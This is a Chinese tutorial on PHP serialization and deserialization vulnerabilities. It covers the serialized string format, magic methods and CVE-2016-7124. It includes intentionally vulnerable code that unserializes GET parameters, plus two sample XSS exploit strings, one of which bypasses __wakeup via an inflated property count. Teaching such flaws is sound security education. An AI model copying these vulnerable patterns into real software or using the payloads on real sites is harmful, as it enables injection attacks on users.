目录
- 预备知识
- PHP序列化与反序列化
- 序列化字符串格式
- PHP魔术方法
- 示例
- 反序列化漏洞
- 构造函数&析构函数
- CVE-2016-7124
预备知识
PHP序列化与反序列化
序列化:将一个复杂的数据类型(如对象、数组、变量等)转换为字符串表示,以便于在网络中传输和在数据库中存储。在PHP语言中使用serialize()
函数实现。
反序列化:将一个序列化的字符串重新转换为一个具体的数据类型。在PHP语言中使用unserialize()
函数实现。 PHP对象中只有数据会被序列化,方法不会被序列化。
序列化字符串格式
PHP中经过序列化的字符串格式如下:
类型:类名长度:“类名”:类属性数量:{属性类型:属性长度:“属性内容”}
序列化字符串中的属性命名规则:如果变量为public,则值保持不变;如果变量为private,则在值开头加上类名前缀;如果变量为protected,则在值开头加*
符号。
下面给出序列化字符串中的属性类型:
类型 | 解释 |
s:length:“value” | 字符串 |
i:value | 整数值 |
d:value | 浮点数值 |
b:value | 布尔值 |
a:length:{…} | 数组 |
O:length:“name”:number:{…} | 对象 |
N | NULL |
PHP魔术方法
简介:魔术方法是一种以2个下划线开头的特殊方法,对一个对象执行魔术方法时会覆盖PHP默认的操作。
常见的PHP魔术方法如下:
方法 | 调用时间 |
__construct(构造函数) | 创建新对象时 |
__destruct (析构函数) | 销毁对象时 |
__call | 在对象中调用不可用方法时 |
__callStatic | 在上下文中调用不可用方法时 |
__get | 读不可用值时 |
__set | 写不可用值时 |
__isset | 对不可用值调用 |
__unset | 对不可用值调用 |
__sleep | 序列化对象时 |
__wakeup | 反序列化对象时 |
__toString | 对象被作为字符串使用时 |
__invoke | 尝试以调用函数方式调用对象时 |
示例
<?php
class Test{
public $a="aaa";
private $b="bbb";
protected $c=123;
function __construct($a,$b,$c)
{
$this->a=$a;
$this->b=$b;
$this->c=$c;
echo("Constructor called.<br>");
}
function __destruct()
{
echo("Destructor called.<br>");
}
function show()
{
echo($this->a."\n".$this->b."\n".$this->c."<br>");
}
}
$data=new Test("a",1,1.1);
$data_str=serialize($data);
echo($data_str."\n");
$data_new=unserialize($data_str);
echo("<br>");
$data_new->show();
?>
反序列化漏洞
反序列化漏洞指网站未对被用户所控制的序列化字符串做检查,攻击者提交了精心构造的有害序列化字符串,导致恶意代码被执行。常见于PHP、Python、Java等允许对象序列化功能的编程语言中。
在PHP中,导致反序列化漏洞的原因大多是魔术方法的不规范使用。(如输出变量内容、写文件操作、写数据库操作等参数用户可控)
构造函数&析构函数
假设网站页面部分代码编写如下:
<?php
class Test
{
var $a="aaa";
function __construct($a)
{
$this->a=$a;
echo("Info:<br>".$a);
}
}
$data_new=unserialize($_GET['data']);
var_dump($data_new);
?>
当对象创建(或销毁)时,程序会输出对象中三个成员变量的值;程序还从API接口读取了一个序列化字符串并试图将其反序列化。此时如果将序列化字符串中的值修改为恶意代码,类名修改为Test
,会导致反序列化漏洞攻击。
EXP:O:4:“Test”:1:{s:4:“test”;s:29:“<script>alert(‘xss’)</script>”;}
CVE-2016-7124
在PHP5 <5.6.25
、PHP7 <7.0.10
的环境中,如果类中存在__wakeup
魔术方法,则在反序列化之前会先调用该方法。但当序列化字符串中属性数量大于真实属性数量时,该方法不会执行。
<?php
class Test
{
var $mess="111";
function __wakeup()
{
$this->mess="failed";
echo("Please try again.<br>");
}
}
$new_data=unserialize($_GET['ins']);
var_dump($new_data);
?>
代码中,当反序列化一个字符串时,程序会执行__wakeup
方法,将$mess
设置为字符串,并显示失败信息。此时把序列化字符串中的属性数量值改大,__wakeup
方法会失效。
EXP:http://127.0.0.1/serialize.php?ins=O:4:“Test”:2:{s:4:“mess”;s:25:"<script>alert(1)</script>";}